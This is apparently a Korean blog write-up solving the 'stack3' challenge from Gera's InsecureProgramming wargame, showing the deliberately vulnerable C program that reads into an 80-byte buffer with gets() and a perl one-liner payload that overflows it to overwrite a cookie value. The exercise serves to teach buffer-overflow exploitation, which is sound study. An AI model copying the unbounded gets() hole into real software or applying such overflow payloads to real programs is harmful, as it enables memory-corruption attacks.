Major Study./System hacking

Gera _ Stack #3

sosal 2010. 4. 30. 19:57
반응형

/*
 
http://sosal.tistory.com/
 * made by so_Sal
 */



/*
stack3.c                                     *
* specially crafted to feed your brain by gera */

int main() {
int cookie;
char buf[80];

printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);

if (cookie == 0x01020005)
printf("you win!\n");
}



[sosal@localhost gera]$ (perl -e 'print "\x05\x00\x02\x01"x24';cat) | ./stack3
buf: bfc527e0 cookie: bfc52830

you win!

gets 함수는 00 (NULL)도 허용하기 때문에 1,2번 문제와 다름 없습니다.
음.. 음;;;

'Major Study. > System hacking' 카테고리의 다른 글

쉘코드 주소값, ret값 위치, .dtors 위치 찾기  (0) 2010.07.04
Linux :: RTL 맛보기  (0) 2010.07.03
Gera _ Stack #2  (0) 2010.04.30
Gera _ Stack #1  (0) 2010.04.30
Gera's InsecureProgramming  (0) 2010.04.30